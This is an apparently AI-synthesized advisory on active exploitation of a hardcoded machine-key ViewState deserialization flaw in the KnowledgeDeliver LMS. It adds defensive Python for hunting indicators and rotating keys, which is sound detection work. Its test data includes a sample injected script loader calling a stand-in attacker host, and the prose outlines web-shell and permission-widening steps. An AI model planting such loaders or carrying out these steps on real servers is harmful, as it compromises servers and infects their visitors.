VYPR advisory · Published May 25, 2026 · 1 source

Mandiant Uncovers Active Exploitation of KnowledgeDeliver ViewState Deserialization Flaw (CVE-2026-5426)

Mandiant reports active exploitation of a critical ViewState deserialization vulnerability in KnowledgeDeliver, a Japanese LMS, allowing unauthenticated remote code execution via hardcoded ASP.NET machine keys.

Mandiant has disclosed active exploitation of a critical vulnerability in KnowledgeDeliver, a Learning Management System (LMS) developed by Digital Knowledge and widely used in Japan. The flaw, now tracked as CVE-2026-5426, allows unauthenticated remote code execution through ASP.NET ViewState deserialization, stemming from the use of identical pre-shared machine keys across multiple customer deployments. Mandiant responded to an incident in late 2025 involving a compromised web server running KnowledgeDeliver, where an unknown threat actor leveraged this zero-day to inject malicious code and infect site visitors.

The vulnerability originates from a standardized web.config file provided by the vendor before February 24, 2026, which contained hardcoded machineKey values used by the ASP.NET framework to encrypt and sign ViewState payloads. Because these keys were identical across independent customer environments, any threat actor who obtained the keys from one deployment could compromise any other internet-facing KnowledgeDeliver instance. By crafting a malicious ViewState payload and sending it via the __VIEWSTATE parameter in an HTTP request, the attacker could force the server to deserialize it, achieving remote code execution. This technique mirrors previous ViewState deserialization attacks against Sitecore and other ASP.NET applications.

Once access was established, the threat actor deployed a .NET-based in-memory web shell called BLUEBEAM (also known as Godzilla), which operates entirely within the IIS worker process (w3wp.exe), evading traditional file-based detection. The actor then ran commands to widen their control over the file system, using icacls to grant "Everyone" full access to the web application directory. They also tampered with a JavaScript file so that it displayed a fake security alert prompting users to install a "security authentication plugin"; the alert silently loaded a remote malicious script from a domain controlled by the threat actor.

The remote script convinced users to download a fake installer, leading to infection with a Cobalt Strike BEACON backdoor. The payload was encrypted using a key derived from the compromised organization's name, indicating the threat actor prepared the payload specifically for the targeted organization. Mandiant noted that the use of BLUEBEAM is consistent with previous Microsoft reporting on similar attacks.

Mandiant has provided detailed hunting guidance for organizations. Key indicators include Windows Application Event ID 1316 from ASP.NET 4.0.30319.0, where "Viewstate verification failed" with reason "Viewstate was invalid" may indicate successful deserialization. Suspicious child processes spawned by w3wp.exe, such as cmd.exe or powershell.exe, should be investigated. File integrity monitoring should focus on unauthorized changes to .js, .aspx, or .config files, particularly the addition of remote script loaders. Anomalous User-Agent strings consisting of two distinct identifiers concatenated together have also been observed.
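The hunting guidance above translates into four small checks that can be run over exported telemetry. The following is an added example (not Mandiant's or Digital Knowledge's tooling) that applies each check to constructed sample records; the record field names (event_id, source, message, image, parent_image) are assumptions about how a SIEM or EDR export might look, and the User-Agent test is a heuristic of my own, not a published signature.

```python
"""Hunting helpers for the KnowledgeDeliver indicators listed above: ASP.NET
Event ID 1316, suspicious children of w3wp.exe, remote script loaders added
to web files, and User-Agent strings made of two identifiers glued together.

Added example, not Mandiant tooling. All sample records are constructed and
their field names are assumptions about a SIEM/EDR export format.
"""
import re
from urllib.parse import urlsplit

# --- Indicator 1: Windows Application log Event ID 1316 from ASP.NET ---------
VIEWSTATE_RE = re.compile(r"Viewstate verification failed.*Viewstate was invalid",
                          re.IGNORECASE | re.DOTALL)

def viewstate_failure_events(events):
    """Events with ID 1316, an ASP.NET source and the ViewState failure text."""
    return [ev for ev in events
            if ev.get("event_id") == 1316
            and str(ev.get("source", "")).startswith("ASP.NET")
            and VIEWSTATE_RE.search(ev.get("message", ""))]

# --- Indicator 2: the IIS worker process spawning a shell --------------------
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe"}

def basename(path):
    """Last path component, accepting Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()

def suspicious_w3wp_children(proc_events):
    """Process-creation records where w3wp.exe starts cmd.exe or powershell.exe."""
    return [p for p in proc_events
            if basename(p["parent_image"]) == "w3wp.exe"
            and basename(p["image"]) in SUSPICIOUS_CHILDREN]

# --- Indicator 3: remote script loaders injected into .js/.aspx files --------
SCRIPT_SRC_RE = re.compile(r"""(?:\bsrc\s*=\s*)["']?(https?://[^"'\s>]+)""", re.IGNORECASE)

def remote_script_hosts(text, allowed_hosts):
    """Hosts referenced by script src assignments that are not on the allowlist."""
    hosts = {urlsplit(m).hostname for m in SCRIPT_SRC_RE.findall(text)}
    return sorted(h for h in hosts if h and h not in allowed_hosts)

# --- Indicator 4: two User-Agent identifiers concatenated (heuristic) --------
# Assumption: a genuine UA carries exactly one of these leading product tokens.
UA_LEAD_RE = re.compile(r"(?:Mozilla|curl|Wget|python-requests|Go-http-client)/", re.IGNORECASE)

def is_concatenated_user_agent(ua):
    """True when two or more leading product tokens appear in one User-Agent."""
    return len(UA_LEAD_RE.findall(ua)) >= 2

def hunt(events, procs, web_text, allowed_hosts, user_agents):
    """Run all four checks and summarise the hits."""
    return {
        "viewstate_failures": len(viewstate_failure_events(events)),
        "w3wp_shell_children": len(suspicious_w3wp_children(procs)),
        "unexpected_script_hosts": remote_script_hosts(web_text, allowed_hosts),
        "concatenated_user_agents": [ua for ua in user_agents if is_concatenated_user_agent(ua)],
    }

# Constructed sample telemetry (not real log data).
SAMPLE_EVENTS = [
    {"event_id": 1316, "source": "ASP.NET 4.0.30319.0",
     "message": "Viewstate verification failed. Reason: Viewstate was invalid."},
    {"event_id": 1316, "source": "OtherProvider",
     "message": "Viewstate verification failed. Reason: Viewstate was invalid."},
    {"event_id": 1000, "source": "ASP.NET 4.0.30319.0", "message": "Application started."},
]
SAMPLE_PROCS = [
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\cmd.exe"},
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\conhost.exe"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]
SAMPLE_JS = ("var s=document.createElement('script');"
             "s.src='https://plugin-update.example.invalid/auth.js';"
             "document.head.appendChild(s);"
             "var t=document.createElement('script');t.src=\"https://lms.example.internal/app.js\";")
SAMPLE_UAS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36"
    "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36",
]

if __name__ == "__main__":
    import json
    print(json.dumps(hunt(SAMPLE_EVENTS, SAMPLE_PROCS, SAMPLE_JS,
                          {"lms.example.internal"}, SAMPLE_UAS), indent=2))
```

Treat the Event ID 1316 hit as a trigger for the other checks rather than as proof on its own: the same event also fires on benign stale ViewState after an application-pool recycle, so correlate it with a w3wp.exe child process or a changed web file before escalating. The allowlist passed to `remote_script_hosts` should be the hosts a clean copy of the application actually references.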

Remediation requires immediately rotating machine keys to generate unique, cryptographically random values for each deployment. Organizations should also apply any patches released by Digital Knowledge, monitor for the indicators described above, and review their ASP.NET configurations to ensure machine keys are not shared across environments. This incident underscores the critical importance of keeping machine keys unique and secure, as their exposure can lead to widespread compromise across multiple deployments.
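The root cause described earlier (a vendor-supplied web.config with literal machineKey values repeated across customers) and the remediation described here (unique, random keys per deployment) can both be checked mechanically. The following is an added example, not Digital Knowledge's tooling; the two web.config fragments are constructed, and the key values in them are placeholders rather than the leaked KnowledgeDeliver keys.

```python
"""Audit ASP.NET web.config files for hardcoded or shared <machineKey> values
and rotate them to unique, cryptographically random keys.

Added example, not Digital Knowledge's tooling. The config fragments below are
constructed; their key values are placeholders, not the leaked keys.
"""
import secrets
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed: two deployments shipped with the same literal machineKey.
SHARED_KEY_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER_SHARED_VALIDATION_KEY"
                decryptionKey="PLACEHOLDER_SHARED_DECRYPTION_KEY"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""
SAMPLE_CONFIGS = {"customer-a": SHARED_KEY_CONFIG, "customer-b": SHARED_KEY_CONFIG}

# Constructed: the safe default, where ASP.NET generates keys per application.
AUTOGEN_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps" validation="HMACSHA256" />
  </system.web>
</configuration>"""


def machine_key(config_xml):
    """Attributes of <configuration><system.web><machineKey>, or None if absent."""
    node = ET.fromstring(config_xml).find("./system.web/machineKey")
    return dict(node.attrib) if node is not None else None


def is_hardcoded(mk):
    """True when validationKey or decryptionKey holds a literal value instead of AutoGenerate."""
    if mk is None:
        return False
    return any(not mk.get(attr, "AutoGenerate").startswith("AutoGenerate")
               for attr in ("validationKey", "decryptionKey"))


def shared_keys(configs):
    """Map each literal validationKey to the deployments using it; keep keys seen in two or more."""
    by_key = defaultdict(list)
    for name, xml in configs.items():
        mk = machine_key(xml)
        if is_hardcoded(mk):
            by_key[mk.get("validationKey")].append(name)
    return {k: v for k, v in by_key.items() if len(v) > 1}


def rotate(config_xml):
    """Return config_xml with a fresh machineKey: 64 random bytes for HMACSHA256, 32 for AES-256."""
    root = ET.fromstring(config_xml)
    sw = root.find("system.web")
    if sw is None:
        sw = ET.SubElement(root, "system.web")
    node = sw.find("machineKey")
    if node is None:
        node = ET.SubElement(sw, "machineKey")
    node.set("validationKey", secrets.token_hex(64).upper())
    node.set("decryptionKey", secrets.token_hex(32).upper())
    node.set("validation", "HMACSHA256")
    node.set("decryption", "AES")
    return ET.tostring(root, encoding="unicode")


def rotate_all(configs):
    """Rotate every deployment independently so that no two share a key."""
    return {name: rotate(xml) for name, xml in configs.items()}


if __name__ == "__main__":
    print("shared before rotation:", shared_keys(SAMPLE_CONFIGS))
    rotated = rotate_all(SAMPLE_CONFIGS)
    print("shared after rotation:", shared_keys(rotated))
    print(rotated["customer-a"])
```

Two caveats when applying this in practice. Servers that form one web farm for the same application must keep identical keys, so rotation is per application or customer deployment, not per server. Rotation also invalidates every outstanding ViewState and forms-authentication ticket signed with the old key, so schedule it as a maintenance step and expect a burst of benign Event ID 1316 entries immediately afterwards.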

Synthesized by Vypr AI